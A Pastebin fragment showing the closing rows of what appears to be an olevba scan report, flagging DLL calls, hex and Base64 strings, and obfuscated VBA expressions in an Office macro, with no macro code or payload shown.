  612. | Suspicious | Lib                  | May run code from a DLL                 |
  613. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  614. |            |                      | be used to obfuscate strings (option    |
  615. |            |                      | --decode to see all)                    |
  616. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  617. |            |                      | may be used to obfuscate strings        |
  618. |            |                      | (option --decode to see all)            |
  619. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  620. |            | Strings              | may be used to obfuscate strings        |
  621. |            |                      | (option --decode to see all)            |
  622. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!